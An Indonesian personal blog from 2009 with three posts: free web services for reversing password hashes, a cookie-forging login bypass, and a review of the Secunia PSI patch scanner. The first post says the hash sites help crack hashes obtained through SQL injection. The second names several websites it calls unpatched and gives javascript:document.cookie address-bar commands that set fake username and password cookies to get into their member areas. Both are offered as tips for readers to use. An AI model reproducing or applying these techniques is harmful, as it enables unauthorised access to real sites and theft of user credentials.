Posted on June 5, 2009 by sgk
apa sich software tuk cek nilai hash
kemaren ada yang nyasar ke blog ini ama kata kunci itu 
saya orangnya pemalas dan rada parno ama software gratisan … takutnya disisipin trojan di softwarenya dan ga ke detect ama antivitus+update terbarunya sekalipun
makanya untuk hash-ing (convert to/reverse) saya lebih suka “web based hash(-ing)”
(makin parah ajah ni kosakata IT nya :p) … beberapa situs yang saya suka pake:
-passcracking
-benramsey
-hashcrack
-reversehas
-dustinfineout
Kenapa link2 diatas? soalnya saya sering nemu “jawaban” dari hasil sql injection disana
,databasenya lumayan okeh
… trus beberapa link diatas udah pake kombinasi teknik: classic rainbow tables, hybrid rainbow tables, & dictionary … dan yang paling penting: gratis, ga usah registrasi, & ga perlu install
Filed under: Tips&Trick | Tagged: convert to hash, dictionary table, hash, hybrid table, rainbow table, reverse hash, sql injection | 2 Comments »
Posted on May 23, 2009 by sgk
lagi nyari informasi tentang sql injection trus “nyasar” ke sekuritionline … eh malah dapet informasi tentang javascript 
celah ini juga sudah di publish di beberapa website sekuriti lain, termasuk secunia.
berikut ini beberapa situs yang masih belum di patch waktu saya coba:
ebook
hotscripts
rss
membership
recipe
cukup masukan javascript berikut ke address bar di browser:
javascript:document.cookie = “username=kanabies; path=/”;
javascript:document.cookie = “password=kanabies; path=/”;
perintah itu akan membuat username dan password: kanabies
hal ini bisa dicek dengan memasukan salah satu syntax berikut ke address bar di browser:
javascript:alert(document.cookie)
javascript:alert(unescape(document.cookie))
javascript:alert(unescape(document.cookie).replace(/;/gi,”\n\n”))
javascript:alert(unescape(unescape(document.cookie)).replace(/;/gi,”\n\n”))
setelah itu kita bisa masuk ke menu yang ada dan menjalankan perintah/fitur yand ada
di firefox ada addon yang khusus untuk mengedit cookies:
firefox-addons
CMIIW,
ga ada sql … javascript pun jadi
sumber:
sekuritionline
jammed
javaranch
Filed under: Tips&Trick | Leave a Comment »
Posted on May 19, 2009 by sgk
Untuk menjaga keamanan aplikasi-aplikasi yang terinstall di komputer kita ada baiknya apabila kita selalu meng-update patches atau menginstall versi terbaru dari aplikasi-aplikasi yang kita gunakan. Secunia, computer security service provider dari denmark yang didirikan oleh Niels Henrik Rasmussen dan Thomas Kristensen, membuat sebuah aplikasi gratis (untuk penggunaan personal) yang membantu kita untuk men-scan&udpate dari masing2 aplikasi yang terinstall di komputer kita. Selain untuk meng-update aplikasi yang ada, secunia juga bisa untuk men-scan virus. Adapun produk yang dikembangkan oleh mereka adalah:
-Enterprise Security Manager
-Vulnerability Tracking Service
-Surveillance Scanner
-Network Software Inspector
-Personal Software Inspector
-Online Software Inspector
Beikut fitur utama secunia-PSI:
-Scan, melakukan scan terhadap program-program yang ada di komputer
-Insecure Program, memberikan informasi program yang “kurang aman” dan memberikan informasi link download program terbaru atau solusinya, add/remove program, referensi online, detail dan sebagainya.
-End of Life, memberikan informasi program yang tidak di support lagi oleh vendor pembuatnya. Disertai link download versi terbaru atau untuk uninstall.
-Patched, memberikan informasi program yang dideteksi, tetapi diketahui tidak mempunyai update security (jadi mungkin tidak memerlukan perhatian yang lebih)
-Overview, memberikan informasi (gambaran umum) kondisi komputer setelah di scan.
Di ZDNet, Secunia PSI masuk daftar 10 besar Essential security tools, dan berada di urutan pertama dalam kategori free software. Aplikasi ini hanya berukuran sekitar 521 KB dan bisa berjalan di platform Windows 2000, XP 32/64bit, dan Vista 32/64bit. Agar bisa berjalan (Scan) maka perlu adanya koneksi internet.
Link:
en.wikipedia.org
download PSIsetup.exe
advisories
CMIIW,
Stay secure
Filed under: News | Tagged: komputer, scan software, secunia, security | 1 Comment »